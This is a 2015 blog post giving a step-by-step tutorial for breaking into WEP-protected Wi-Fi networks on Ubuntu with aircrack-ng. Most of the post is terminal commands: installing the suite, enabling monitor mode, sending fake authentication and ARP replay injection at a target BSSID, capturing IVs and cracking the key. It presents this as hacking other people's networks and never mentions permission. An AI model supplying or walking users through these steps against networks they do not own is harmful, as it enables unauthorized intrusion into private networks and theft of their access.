welcome to my website and learn much more tips and Tricks

Sunday, May 17, 2015

How to hack a wifi (WEP) protected network?

How to hack a wifi (WEP) protected network?
In this post I am gonna tell how you can hack a wifi network (wep protected) using ubuntu linux. You can also hack other networks but it will be a bit complicated so as a newbie lets start with wep networks.
First of all you need to get Ubuntu linux which you can download from here
http://www.ubuntu.com/download/desktop If you already have ubuntu then there is no need to download and those who don’t have download it and write the image file in the CD or Dvd or you can also create a virtual machine or a bootable pen drive to start ubuntu.
I prefer virtual machine is the best way. If you don’t know how to create a virtual machine then you can message me or comment below.
Ok now coming back to the topic after booting ubuntu you need to install aircrack in it many versions have aircrack inbuilt so the better way to check that is go to terminal and type “sudo airmon-ng” if it says command not found then it means you need to install aircrack To install aircrack follow the steps shown below Open terminal and type
1)sudo apt-get install build-essential
2) sudo apt-get install libssl-dev
3) wget http://download.aircrack-ng.org/aircrack- ng-1.1.tar.gz
4) tar -zxvf aircrack-ng-1.1.tar.gz
5) cd aircrack-ng-1.1
5) In the aircrack-ng-1.1 directory there is a file called common.mak, use your favorite editor to open the file and scroll down till you see the following line:
CFLAGS ?= -g -W -Wall -Werror -O3 Delete the -Werror variable, so that the line now looks like the following. Save and exit. CFLAGS ?= -g -W -Wall -O3 6) Run make and sudo make install in terminal to get aircrack-ng up and running." Now that you have installed aircrack successfully open new terminal and type “sudo airmon-ng” It will show your wifi hardware/driver available named wlan0
Now type “sudo airmon-ng start wlan0” Your wifi device is now selected
Now type “sudo airodump-ng mon0” ( This command will scan all wifi devices available)
Here we are going to Hack WEP Encryption, so we will hack the WiFi named "Ztuts"
PS: Hacking WPA or WPA2 PSK is not very easy but we will speak about it later.
Now type in the terminal : sudo airodump-ng -- channel 9 mon0
Replace the channel with the WiFi's channel (in grey color)
It will keeps scanning and collecting data from WiFi that uses channel 9.
Let that window be opened and don't close it. Step 3 ( Sending Fake Authentication )
Open a new terminal and type : sudo aireplay-ng --fakeauth 0 -a 00:1B:11:6E:78:6D -e Ztuts mon0 Replace 00:1B:11:6E:78:6D with the BSSID (Mac Address) of the WiFi.
Replace "Ztuts" with the name of the WiFi It will sends fake authentication to make sure the access point don't use mac filtering.
Step 4 ( Collecting and Saving Data Capture )
Open a new terminal and Type : sudo airodump-ng --channel 9 -w /home/razor/ztutswep -i mon0
Replace channel with the channel you used in step
2. Replace the directory "/home/razor/ztutswep" with the directory you want to save the data. ( you can just type the name of the file : e.g : "crackwep" ) It will starts capturing data from the access point, but we need to speed up the capture of the packets:
Open a new terminal and type : sudo aireplay-ng -3 -b 00:1B:11:6E:78:6D mon0 Replace 00:1B:11:6E:78:6D with the WiFi's Mac address.
Let everything work a little bit and you should receive ARP requests and the data will begin increasing fast.
Step 5 ( Cracking the Password ) If you have captured enough data ( varies with the security key) you have to crack it down:
Open a terminal and Type : sudo aircrack-ng -0 -b 00:1B:11:6E:78:6D /home/razor/ztutswep-02.ivs Replace the directory with the one used before.
If you have collected sufficient IVS (data) it will crack the key, if not it will stand for and wait until you collect many data.
Here is how it looks if it hacks the key: Done Hacking Wireless Protected Access, and the Key is: RAZORTUTS
As facebook dosen't allow images with text so it is difficult to understand for a non trained computer/ linux user so soon i will post a video tutorial and for now if you want a good explanation with images than wait my next post....

No comments:

Post a Comment